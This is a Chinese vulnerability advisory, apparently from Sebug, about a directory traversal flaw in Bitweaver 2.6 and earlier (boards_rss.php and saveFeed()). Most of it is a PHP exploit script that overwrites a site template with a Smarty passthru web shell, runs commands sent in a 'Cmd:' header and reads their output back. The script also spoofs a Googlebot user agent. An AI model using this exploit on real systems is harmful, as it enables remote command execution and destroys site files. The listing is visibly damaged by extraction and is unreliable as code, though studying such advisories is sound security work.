Bitweaver version参数目录遍历漏洞
影响版本:
Bitweaver Bitweaver <= 2.6
漏洞描述:
BUGTRAQ ID: 34910
Bitweaver是免费的开源web应用框架和内容管理系统。
Bitweaver的boards/boards_rss.php模块没有正确地过滤通过version参数传入的数据,便将其用于构造所写入文件的路径:
...
// Call site in boards/boards_rss.php (excerpt; the `$` sigils appear to have been stripped by extraction).
// Per the advisory text the first argument is derived from $_REQUEST['version']; nothing shown
// here normalises it before it becomes the path that saveFeed() creates directories for and writes.
echo rss->saveFeed( rss_version_name, cacheFile );
...
以不安全方式调用了saveFeed()函数:传入的文件名参数基于$_REQUEST['version']生成,可能包含目录遍历序列(../),而saveFeed()本身不对该路径做任何规范化或目录限制。
在/rss/feedcreator.class.php的saveFeed()函数中:
...
// rss/feedcreator.class.php excerpt (method of a class whose header is not shown; the `$`
// sigils appear to have been stripped by extraction).
//
// Writes the generated feed to `filename`, creating missing parent directories first, and,
// when `displayContents` is true, hands the path to _redirect().
//
// Vulnerability as described in this advisory: `filename` is used verbatim -- no basename()/
// realpath() check and no allow-listed base directory -- so a caller that passes an
// unfiltered request parameter lets that parameter choose where mkdir_p() and fopen() operate.
function saveFeed(filename="", displayContents=true) {
// Only the empty string falls back to the internal name; any other caller-supplied value is trusted as-is.
if (filename=="") {
filename = this->_generateFilename();
}
// mkdir_p() is not shown here; its name suggests recursive creation of every missing
// directory on the caller-controlled path (the advisory's "arbitrary directory creation").
if ( !is_dir( dirname( filename ))) {
mkdir_p( dirname( filename ));
}
// "w+" truncates whatever file the path resolves to, so an existing file is overwritten
// with the feed body produced by createFeed().
feedFile = fopen(filename, "w+");
if (feedFile) {
fputs(feedFile,this->createFeed());
fclose(feedFile);
if (displayContents) {
// NOTE(review): what _redirect() does with the path is not shown; the PoC on this page
// treats the HTTP response as the feed body, so it presumably serves the written file.
this->_redirect(filename);
}
} else {
echo "<br /><b>Error creating feed file, please check write permissions.</b><br/>"; }
}
}
...
由于saveFeed()直接对该路径调用mkdir_p()和fopen(),无论php.ini设置如何,攻击者都可以在Web服务进程具有写权限的任意位置创建目录、覆盖已有文件,并且可以让路径以任意扩展名结尾(写入的内容为createFeed()生成的feed)。
<*参考
http://secunia.com/advisories/35057/
http://marc.info/?l=bugtraq&m=124213918429416&w=2
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<?php
// Exploit PoC: a PHP CLI script (the page's "perl" language hint is wrong). The listing is a
// damaged extraction of the original: `$` sigils are missing, `\` became `/` (so "/n" is
// "\n", "/r/n" is "\r\n", "/x00" is "\x00"), long lines were wrapped with a trailing " /",
// and straight quotes became ’ ’. The code is kept verbatim; only comments were added.
//
// Preamble: refuse to run outside the CLI SAPI, and try to load the curl extension if it is
// not already present.
err[0] = "[!] This script is intended to be launched from the cli!";
err[1] = "[!] You need the curl extesion loaded!";
if (php_sapi_name() <> "cli") {
die(err[0]);
}
if (!extension_loaded(’curl’)) {
// Choose the curl shared object by platform prefix of PHP_OS; dl() returns false on failure.
// `nil` is not a PHP keyword -- it is a bareword in the "no-op" branch of the ternary.
win = (strtoupper(substr(PHP_OS, 0, 3)) === ’WIN’) ? true :
false;
if (win) {
!dl("php_curl.dll") ? die(err[1]) :
nil;
} else {
!dl("php_curl.so") ? die(err[1]) :
nil;
}
}
// Prints usage and exits. Positional arguments: host, path prefix, user, pass, command;
// options: --port:N (default 80) and --proxy:host:port.
// The single print() argument below is one long string concatenation that the extraction
// wrapped with trailing " /" markers; "/n" was "\n" and argv[0] was $argv[0]. No comments
// are placed inside it, since a "//" there would sit inside the string literal.
function syntax() {
print (
"Syntax: php ".argv[0]." [host] [path] [user] [pass] [cmd] [options] /n". /
"Options: /n". /
"--port:[port] - specify a port /n". " /
default->80 /n". "--proxy:[host:port] - use /
proxy /n". "Examples: php ".argv[0]." /
192.168.0.1 /bitweaver/ bookoo pass ls /n". " php ".argv[0]." /
192.168.0.1 / bookoo pass ls -a --proxy:1.1.1.1:8080/n". " php /
".argv[0]." 192.168.0.1 / bookoo pass cat ../kernel/config_inc.php --port:81"); /
die(); }
// Argument parsing (see syntax()): argv[1] host, argv[2] path prefix, argv[3] user,
// argv[4] pass, argv[5..] the remote command.
// NOTE(review): argv[1..4] are read before any arity check, so a short command line
// produces undefined-offset notices (error_reporting(E_ALL)) before syntax() is reached.
error_reporting(E_ALL);
host = argv[1];
path = argv[2];
_usr = argv[3];
_pwd = argv[4];
_cmd = "";
// Every word from argv[5] on that is not a --proxy:/--port: option is appended to the
// command, each with a leading space (strstr here, stristr in the option scan below).
for (i = 5; i < argc; i++) {
if ((!strstr(argv[i], "--proxy:")) and (!strstr(argv[i], "--port:"))) {
_cmd .= " ".argv[i];
}
}
// No fifth argument means no command: print usage and exit.
argv[5] ? print("[*] Command->_cmd/n") :
syntax();
_use_proxy = false;
port = 80;
// Option scan starts at argv[3], so a --proxy:/--port: token in the user/pass slot is
// honoured as an option while still being used as the credential above.
for (i = 3; i < argc; i++) {
if (stristr(argv[i], "--proxy:")) {
_use_proxy = true;
// --proxy:host:port -> split on ":"; port cast to int.
tmp = explode(":", argv[i]);
proxy_host = tmp[1];
proxy_port = (int)tmp[2];
}
if (stristr(argv[i], "--port:")) {
// --port:N overrides the default of 80.
tmp = explode(":", argv[i]);
port = (int)tmp[1];
}
}
// HTTP helper: one curl request to `url` -- a POST with body `request` when `is_post` is
// truthy, otherwise a GET. Returns the raw response including headers (CURLOPT_HEADER=1);
// exits on a curl transport error.
// Globals: proxy settings from the option scan, and `cookie` captured from the probe response.
// The remote command travels in a custom "Cmd:" request header with its stdout redirected
// to ./../readme; the injected template (see the {php}passthru check below) is expected to
// read it back as $_SERVER['HTTP_CMD'].
function _s(url, cmd, is_post, request) {
global _use_proxy, proxy_host, proxy_port, cookie;
ch = curl_init();
curl_setopt(ch, CURLOPT_URL, url);
if (is_post) {
curl_setopt(ch, CURLOPT_POST, 1);
// "/r/n" was "\r\n" before extraction.
curl_setopt(ch, CURLOPT_POSTFIELDS, request."/r/n");
}
curl_setopt(ch, CURLOPT_RETURNTRANSFER, 1);
// Spoofed crawler User-Agent (the literal was wrapped by extraction); no transfer timeout.
curl_setopt(ch, CURLOPT_USERAGENT, "Googlebot/1.0 (googlebot@googlebot2.com /
http://googlebot2.com/)"); curl_setopt(ch, CURLOPT_TIMEOUT, 0);
curl_setopt(ch, CURLOPT_HEADER, 1);
// "Cookie: cookie" was presumably "Cookie: $cookie" -- the captured session cookie is
// interpolated here. The Cmd: header is sent on every request, including the probe.
headers = array("Cookie: cookie", "Cmd: ".cmd." > ./../readme");
curl_setopt(ch, CURLOPT_HTTPHEADER, headers);
if (_use_proxy) {
curl_setopt(ch, CURLOPT_PROXY, proxy_host.":".proxy_port);
}
_d = curl_exec(ch);
if (curl_errno(ch)) {
// The handle is not closed on this path; die() ends the process anyway.
die("[!] ".curl_error(ch)."/n");
} else {
curl_close(ch);
}
return _d;
}
// Main flow.
//  1. Probe boards/boards_rss.php over plain HTTP (everything below, credentials included,
//     is sent in cleartext).
//  2. Collect Set-Cookie values from the probe response.
//  3. POST the traversal: version=/../../../../themes/templates/footer_inc.tpl\x00 together
//     with the user/pass fields, so saveFeed() writes the feed over the footer template.
//     "/x00" was "\x00"; the NUL presumably truncates whatever suffix the caller appends to
//     the path (not shown on this page -- TODO confirm against boards_rss.php).
//  4. Expect the response to contain the feed XML and the Smarty {php}passthru(...) tag.
//     Where that tag enters the feed is not shown here; presumably a user-controlled field
//     reflected into the feed body -- TODO confirm.
//  5. Request wiki/index.php (which presumably renders the overwritten footer) with the
//     Cmd: header, then fetch ./readme for the command output.
// NOTE(review): this PoC is destructive -- it overwrites a live template and leaves the
// readme output file behind; there is no cleanup or restore step.
my_template = "themes/templates/footer_inc.tpl";
url = "http://host:port".path."boards/boards_rss.php";
_o = _s(url, "", 0, "");
if (stristr(_o, "404 Not Found")) {
die ("[!] Vulnerable script not found!/n");
}
// The comment on the next line was wrapped by extraction: "2.6.0" at the start of the line
// after it belongs to the comment, and the code there is `_tmp = explode("Set-Cookie: ", _o);`.
//catch site cookie, this is needed for version compatibility, not needed in /
2.6.0 _tmp = explode("Set-Cookie: ", _o);
cookie = "";
// Element 0 is everything before the first Set-Cookie; for each later piece keep only the
// name=value part before the first ";" and join them with "; ".
for (i = 1; i < count(_tmp); i++) {
_tmpii = explode(";", _tmp[i]);
cookie .= _tmpii[0]."; ";
}
print("[*] Cookie->".cookie."/n");
// Priming request with a NUL-terminated version value (exact original bytes unclear after
// extraction), followed by the actual traversal write; _usr/_pwd/my_template were $-variables.
_o = _s(url, "", 1, "version=//x00&");
_o = _s(url, "", 1, "u=_usr&p=_pwd&version=/../../../../my_template/x00&");
// Success is inferred from the feed's XML prolog being echoed back ('/"' was '\"').
if (stristr(_o, "<?xml version=/"1.0/" encoding=/"UTF-8/"?>")) {
print ("[*] ’my_template’ successfully overwritten!/n");
} else {
print(_o);
die("[!] Error! No write permission on /".my_template." ...");
}
// The written template must contain the Smarty {php} tag that executes the Cmd: header value.
if (stristr(_o, "{php}passthru(/_SERVER[HTTP_CMD]);{/php}")) {
print ("[*] Shell injected!/n");
} else {
print(_o);
die("[!] Error! Shell not injected!");
}
// Trigger: the command goes out in the Cmd: header (see _s()); its output lands in ./../readme.
url = "http://host:port".path."wiki/index.php";
_o = _s(url, _cmd, 0, "");
// Read the output file back; a 404 means the redirection target was not created.
url = "http://host:port".path."readme";
_o = _s(url, "", 0, "");
if (stristr(_o, "404 Not Found")) {
die ("[!] stdout file not found!/n");
} else {
print("[*] Success!/n"._o);
}
?>
SEBUG安全建议:
Bitweaver
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.bitweaver.org/